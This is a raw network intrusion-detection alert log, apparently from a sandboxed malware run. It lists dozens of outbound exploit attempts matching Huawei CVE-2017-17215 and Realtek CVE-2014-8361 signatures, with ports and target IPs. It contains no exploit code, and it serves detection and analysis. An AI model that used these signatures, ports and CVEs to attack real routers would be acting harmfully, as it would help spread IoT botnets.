                                      07/20/24-23:01:24.898476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4842037215192.168.2.23197.0.21.49
                                      07/20/24-23:01:41.263141TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614320052869192.168.2.23192.12.11.101
                                      07/20/24-23:01:55.606975TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25821852869192.168.2.2364.98.234.97
                                      07/20/24-23:00:57.221313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3734837215192.168.2.2386.49.143.0
                                      07/20/24-23:01:41.580548TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615221052869192.168.2.2394.159.177.21
                                      07/20/24-23:01:44.533289TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4491052869192.168.2.23103.0.203.61
                                      07/20/24-23:01:27.650871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5283837215192.168.2.2341.119.213.132
                                      07/20/24-23:01:07.075937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5102037215192.168.2.23157.136.153.134
                                      07/20/24-23:01:43.669446TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4774252869192.168.2.23218.231.87.4
                                      07/20/24-23:01:55.974605TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25297452869192.168.2.23187.223.52.236
                                      07/20/24-23:01:55.870348TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613794052869192.168.2.2373.223.107.25
                                      07/20/24-23:01:02.070492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3345637215192.168.2.23117.206.232.47
                                      07/20/24-23:01:47.652628TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5070252869192.168.2.232.77.241.40
                                      07/20/24-23:01:03.813611TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4102252869192.168.2.2357.224.40.86
                                      07/20/24-23:01:51.107223TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23604852869192.168.2.2397.235.141.174
                                      07/20/24-23:01:44.890268TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614856852869192.168.2.2318.141.77.94
                                      07/20/24-23:01:49.040108TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25195452869192.168.2.23106.212.70.208
                                      07/20/24-23:01:06.975117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4510837215192.168.2.23197.162.44.242
                                      07/20/24-23:01:08.919725TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24599252869192.168.2.23199.61.238.254
                                      07/20/24-23:01:08.600680TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3458852869192.168.2.2313.188.89.36
                                      07/20/24-23:01:41.304640TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6019252869192.168.2.2340.23.131.130
                                      07/20/24-23:01:27.654172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4897037215192.168.2.2341.27.67.46
                                      07/20/24-23:01:21.915268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5432037215192.168.2.23197.79.255.113
                                      07/20/24-23:01:46.384516TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25692652869192.168.2.23126.192.25.7
                                      07/20/24-23:01:02.104571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5239437215192.168.2.2341.218.93.135
                                      07/20/24-23:01:45.098864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5286452869192.168.2.23145.236.96.35
                                      07/20/24-23:01:04.113037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5360637215192.168.2.23197.209.73.42
                                      07/20/24-23:01:24.894099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5678037215192.168.2.23157.20.66.65
                                      07/20/24-23:01:54.367854TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614113852869192.168.2.23133.36.37.101
                                      07/20/24-23:01:49.563475TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5224852869192.168.2.2374.211.16.76
                                      07/20/24-23:01:06.994337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4045037215192.168.2.23157.242.29.232
                                      07/20/24-23:01:56.304951TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5428852869192.168.2.23187.63.42.28
                                      07/20/24-23:01:53.999179TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4309252869192.168.2.23105.232.226.131
                                      07/20/24-23:02:06.767377TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6071852869192.168.2.23157.69.166.230
                                      07/20/24-23:01:50.313415TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614268852869192.168.2.23149.8.44.5
                                      07/20/24-23:01:02.047411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4330237215192.168.2.23157.111.26.76
                                      07/20/24-23:01:47.808678TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615334252869192.168.2.23206.56.63.93
                                      07/20/24-23:01:27.730585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5489637215192.168.2.2341.64.148.15
                                      07/20/24-23:01:02.104572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3288637215192.168.2.23197.169.129.161
                                      07/20/24-23:01:41.236294TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615525052869192.168.2.23221.157.224.96
                                      07/20/24-23:01:47.766845TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4974452869192.168.2.2357.81.97.111
                                      07/20/24-23:01:00.634089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4868037215192.168.2.231.70.219.104
                                      07/20/24-23:01:47.006773TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3727652869192.168.2.2345.208.1.181
                                      07/20/24-23:01:44.464382TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4259652869192.168.2.23193.12.149.189
                                      07/20/24-23:01:59.738271TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4464052869192.168.2.2335.61.70.96
                                      07/20/24-23:00:57.221301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4997437215192.168.2.23197.231.189.109
                                      07/20/24-23:01:31.333872TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25198652869192.168.2.23103.227.74.238
                                      07/20/24-23:01:46.520663TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5200252869192.168.2.2341.250.44.72
                                      07/20/24-23:01:52.305893TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6031252869192.168.2.2396.239.240.238
                                      07/20/24-23:00:59.158279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5894437215192.168.2.2341.20.92.100
                                      07/20/24-23:01:20.599458TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3435052869192.168.2.23130.80.10.211
                                      07/20/24-23:01:11.636599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4250637215192.168.2.23157.115.1.86
                                      07/20/24-23:01:04.058922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5750037215192.168.2.23157.244.205.180
                                      07/20/24-23:01:42.780168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4656852869192.168.2.2393.36.62.56
                                      07/20/24-23:01:46.225146TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614775852869192.168.2.2390.202.157.65
                                      07/20/24-23:01:27.653586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5197637215192.168.2.23197.98.241.246
                                      07/20/24-23:02:17.128771TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615364852869192.168.2.2361.109.235.175
                                      07/20/24-23:01:12.861753TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4973652869192.168.2.23123.52.107.77
                                      07/20/24-23:00:59.168569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3584037215192.168.2.2372.48.156.196
                                      07/20/24-23:01:47.749865TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5963852869192.168.2.23210.80.122.96
                                      07/20/24-23:01:44.878540TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5174052869192.168.2.2390.145.205.177
                                      07/20/24-23:01:00.633984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3662637215192.168.2.23217.159.91.139
                                      07/20/24-23:01:00.640312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5711037215192.168.2.2341.126.189.157
                                      07/20/24-23:01:08.615260TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4654652869192.168.2.23109.115.27.6
                                      07/20/24-23:01:43.039504TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3793852869192.168.2.2340.50.75.236
                                      07/20/24-23:01:45.350108TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5711052869192.168.2.23179.57.28.204
                                      07/20/24-23:01:48.216693TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24964452869192.168.2.2318.141.77.94
                                      07/20/24-23:01:59.704241TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615474852869192.168.2.2395.71.29.54
                                      07/20/24-23:01:43.203681TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4390452869192.168.2.2393.0.10.232
                                      07/20/24-23:01:20.132511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5380037215192.168.2.23157.242.54.73
                                      07/20/24-23:01:47.995637TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5493052869192.168.2.2317.78.214.126
                                      07/20/24-23:01:42.014480TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24603852869192.168.2.23152.44.195.237
                                      07/20/24-23:01:44.500152TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614024452869192.168.2.23186.206.154.241
                                      07/20/24-23:01:44.602081TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613310452869192.168.2.23140.138.195.141
                                      07/20/24-23:01:07.075937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4071437215192.168.2.2341.45.118.19
                                      07/20/24-23:01:42.501090TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616080052869192.168.2.23104.116.61.223
                                      07/20/24-23:01:54.672544TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3785452869192.168.2.23142.143.249.204
                                      07/20/24-23:01:20.603553TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6029852869192.168.2.2352.234.117.101
                                      07/20/24-23:01:42.672378TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25892652869192.168.2.23112.83.62.168
                                      07/20/24-23:01:27.656128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3515637215192.168.2.2341.243.28.32
                                      07/20/24-23:01:31.986571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5063037215192.168.2.23118.50.177.22
                                      07/20/24-23:01:49.055673TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5898452869192.168.2.23170.132.161.86
                                      07/20/24-23:01:20.181938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3716437215192.168.2.23121.14.221.201
                                      07/20/24-23:01:40.310207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5638637215192.168.2.23157.65.169.99
                                      07/20/24-23:01:58.423882TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3753252869192.168.2.2319.191.190.54
                                      07/20/24-23:01:58.608087TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23711252869192.168.2.23130.253.20.234
                                      07/20/24-23:01:44.922746TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25559452869192.168.2.23216.41.229.158
                                      07/20/24-23:01:49.271801TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5461052869192.168.2.2388.29.47.240
                                      07/20/24-23:01:20.098209TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3871637215192.168.2.23197.245.168.107
                                      07/20/24-23:01:45.580167TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24096052869192.168.2.2375.147.225.215
                                      07/20/24-23:01:04.053605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5740037215192.168.2.23157.25.106.26
                                      07/20/24-23:01:51.290278TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3310852869192.168.2.23139.158.177.85
                                      07/20/24-23:01:55.508957TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4396452869192.168.2.23163.75.91.9
                                      07/20/24-23:01:31.983105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5539437215192.168.2.23197.7.27.198
                                      07/20/24-23:01:51.979094TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4137252869192.168.2.23112.142.124.162
                                      07/20/24-23:00:59.178062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3465437215192.168.2.23197.241.127.58
                                      07/20/24-23:01:41.322614TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616075052869192.168.2.23197.25.236.70
                                      07/20/24-23:01:31.333071TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23985852869192.168.2.23148.228.70.58
                                      07/20/24-23:01:48.520303TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3385652869192.168.2.2368.106.199.227
                                      07/20/24-23:01:20.156820TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3400037215192.168.2.2341.60.131.118
                                      07/20/24-23:01:04.961552TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614284252869192.168.2.23180.155.132.167
                                      07/20/24-23:01:44.158709TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3883452869192.168.2.2336.18.145.215
                                      07/20/24-23:01:49.537827TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615967052869192.168.2.23104.171.202.164
                                      07/20/24-23:01:02.316096TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614925852869192.168.2.23190.34.49.149
                                      07/20/24-23:01:00.645051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5522837215192.168.2.231.136.199.61
                                      07/20/24-23:01:41.286382TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4551852869192.168.2.23145.71.96.96
                                      07/20/24-23:01:55.820768TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614560052869192.168.2.23148.113.15.213
                                      07/20/24-23:01:58.504284TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23312652869192.168.2.23196.117.225.80
                                      07/20/24-23:01:47.420081TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23365452869192.168.2.2343.229.235.45
                                      07/20/24-23:01:43.147289TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24180652869192.168.2.23113.1.100.136
                                      07/20/24-23:01:04.050503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3864637215192.168.2.23157.139.23.30
                                      07/20/24-23:01:12.841280TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6067852869192.168.2.2342.191.217.231
                                      07/20/24-23:01:50.845923TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5597852869192.168.2.2392.64.232.40
                                      07/20/24-23:01:42.677933TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3706252869192.168.2.2332.146.19.98
                                      07/20/24-23:01:49.278428TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3742852869192.168.2.2318.233.238.80
                                      07/20/24-23:01:11.631010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5503837215192.168.2.2341.178.204.197
                                      07/20/24-23:01:45.965905TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5645652869192.168.2.23174.141.27.208
                                      07/20/24-23:01:44.640473TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3328652869192.168.2.2312.188.189.35
                                      07/20/24-23:00:57.221504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860837215192.168.2.23175.193.29.172
                                      07/20/24-23:01:02.395457TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5266052869192.168.2.2382.99.109.50
                                      07/20/24-23:01:04.757513TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613542052869192.168.2.2368.46.168.107
                                      07/20/24-23:01:01.308250TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614730252869192.168.2.23117.49.51.0
                                      07/20/24-23:01:02.745352TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5011852869192.168.2.2374.116.148.181
                                      07/20/24-23:01:24.933370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5219237215192.168.2.23197.181.95.82
                                      07/20/24-23:01:47.614619TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25902052869192.168.2.23154.117.210.216
                                      07/20/24-23:01:01.839255TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614197452869192.168.2.23159.20.45.153
                                      07/20/24-23:01:02.762457TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614077852869192.168.2.23104.152.150.214
                                      07/20/24-23:01:42.497728TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23792452869192.168.2.23118.3.222.239
                                      07/20/24-23:01:46.113314TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5571052869192.168.2.2374.205.109.96
                                      07/20/24-23:01:04.040812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5125837215192.168.2.23209.77.38.74
                                      07/20/24-23:01:50.848727TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615201652869192.168.2.23170.121.46.240
                                      07/20/24-23:01:43.318305TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5304452869192.168.2.23148.119.6.34
                                      07/20/24-23:00:59.178062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3403237215192.168.2.23197.67.179.143
                                      07/20/24-23:01:42.365783TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3649652869192.168.2.2384.227.123.147
                                      07/20/24-23:01:45.667239TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615332852869192.168.2.23153.234.108.85
                                      07/20/24-23:01:52.838689TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25567452869192.168.2.23136.248.242.20
                                      07/20/24-23:01:54.947006TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26054652869192.168.2.23105.224.21.3
                                      07/20/24-23:01:44.602081TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4951452869192.168.2.2370.50.33.70
                                      07/20/24-23:01:02.046626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450437215192.168.2.23197.147.196.56
                                      07/20/24-23:01:27.653309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5671037215192.168.2.23197.70.205.23
                                      07/20/24-23:01:47.850156TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3539852869192.168.2.2391.148.233.46
                                      07/20/24-23:01:08.590754TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23859252869192.168.2.2363.80.178.96
                                      07/20/24-23:01:42.960666TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5669052869192.168.2.2334.53.132.35
                                      07/20/24-23:01:41.249014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5835052869192.168.2.23162.227.232.27
                                      07/20/24-23:01:43.058685TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4442852869192.168.2.2384.198.11.250
                                      07/20/24-23:01:04.114673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5338237215192.168.2.2341.113.152.211
                                      07/20/24-23:01:41.380560TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3434252869192.168.2.2370.124.249.51
                                      07/20/24-23:01:31.979565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4099237215192.168.2.2341.60.50.103
                                      07/20/24-23:01:49.810143TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3533652869192.168.2.2334.147.70.115
                                      07/20/24-23:01:53.675171TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3990852869192.168.2.23145.80.152.144
                                      07/20/24-23:01:56.378725TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615055452869192.168.2.2378.1.44.43
                                      07/20/24-23:01:11.642449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4929237215192.168.2.23197.139.56.71
                                      07/20/24-23:01:24.862410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4098437215192.168.2.23157.167.1.107
                                      07/20/24-23:01:43.058686TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5307252869192.168.2.23162.142.171.159
                                      07/20/24-23:01:58.602024TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25242252869192.168.2.23216.216.135.51
                                      07/20/24-23:01:58.729502TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614990852869192.168.2.23111.91.178.70
                                      07/20/24-23:01:46.987215TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615806852869192.168.2.231.176.237.99
                                      07/20/24-23:01:41.259813TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4632052869192.168.2.23130.201.79.70
                                      07/20/24-23:01:51.576561TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24987852869192.168.2.23102.31.132.7
                                      07/20/24-23:01:48.138392TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615377052869192.168.2.2397.241.192.98
                                      07/20/24-23:01:10.523865TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3554052869192.168.2.2360.92.43.190
                                      07/20/24-23:01:11.816504TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5316837215192.168.2.23157.236.178.97
                                      07/20/24-23:01:46.629198TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25636252869192.168.2.2399.98.54.155
                                      07/20/24-23:01:47.523523TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3325052869192.168.2.2350.12.228.50
                                      07/20/24-23:01:27.679304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5600837215192.168.2.23157.42.253.1
                                      07/20/24-23:01:27.653586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3914037215192.168.2.23157.119.197.238
                                      07/20/24-23:01:45.382207TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25149452869192.168.2.2370.191.15.111
                                      07/20/24-23:00:59.194576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6061637215192.168.2.2343.169.90.245
                                      07/20/24-23:01:53.068475TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4550652869192.168.2.2381.196.84.169
                                      07/20/24-23:01:31.327808TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3291452869192.168.2.2397.255.56.23
                                      07/20/24-23:01:07.005156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5705237215192.168.2.2341.148.208.60
                                      07/20/24-23:02:00.062043TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24891652869192.168.2.23189.86.15.141
                                      07/20/24-23:01:24.934977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5081637215192.168.2.23197.197.41.106
                                      07/20/24-23:01:44.611556TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4713452869192.168.2.2357.16.142.227
                                      07/20/24-23:01:42.677814TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24390052869192.168.2.23204.114.85.200
                                      07/20/24-23:01:44.466756TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24035652869192.168.2.2386.24.154.203
                                      07/20/24-23:01:44.825081TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3918252869192.168.2.2343.113.255.232
